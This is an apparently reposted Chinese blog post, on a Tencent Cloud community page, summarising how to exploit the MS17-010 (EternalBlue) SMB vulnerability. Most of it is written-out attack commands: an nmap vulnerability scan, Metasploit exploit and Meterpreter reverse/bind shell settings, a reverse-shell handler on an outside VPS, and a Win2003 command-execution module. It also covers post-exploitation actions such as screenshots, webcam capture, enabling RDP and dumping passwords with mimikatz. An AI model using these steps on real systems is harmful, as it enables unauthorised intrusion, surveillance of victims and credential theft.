首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >MS17010漏洞利用总结

MS17010漏洞利用总结

作者头像
全栈程序员站长
发布2022-07-01 13:04:03
发布2022-07-01 13:04:03
1.1K0
举报

大家好,又见面了,我是你们的朋友全栈君。

0x01 常规打法

扫描是否存在ms17-010漏洞

代码语言:javascript
复制
nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open

MSF常规漏洞利用:

代码语言:javascript
复制
msf > use exploit/windows/smb/ms17_010_eternalblue 
msf > set rhost 192.168.1.112 
反向打:
msf > set payload windows/x64/meterpreter/reverse_tcp 
msf > set lhost 192.168.1.118
正向打:
msf > set payload windows/x64/meterpreter/bind_tcp

常用功能:

代码语言:javascript
复制
桌面抓图 
meterpreter > screenshot
视频开启 
meterpreter > webcam_scream
开启远程桌面 
meterpreter > run post/windows/manage/enable_rdp 
目标密码破解
第一步:载入mimikatz
meterpreter > load mimikatz
第二步:使用命令wdigest获取密码
meterpreter >wdigest

0x02 反弹到VPS稳定打法

(常规打不好使的情况下。)

1.环境 vps 140.x.x.x 目标 192.168.3.123 本地kali 192.168.3.62

2.vps开启监听。

代码语言:javascript
复制
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 443
exploit -j -z 

3.kali下开始攻击。

代码语言:javascript
复制
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.3.123
set payload windows/x64/meterpreter/reverse_tcp
set lhost 140.x.x.x  #反弹到vps
set lport 443

run到下图界面Ctrl+C

4.vps收到meterpreter。(如果不稳定就多打几次)

0x03 目标为Win2003情况下稳定打

方法一(命令执行)

代码语言:javascript
复制
msf5 > use auxiliary/admin/smb/ms17_010_command
msf5 > set command whoami
msf5 > set rhosts x.x.x.x

方法二(返回meterpreter)

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/131363.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x01 常规打法
  • 0x02 反弹到VPS稳定打法
  • 0x03 目标为Win2003情况下稳定打
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档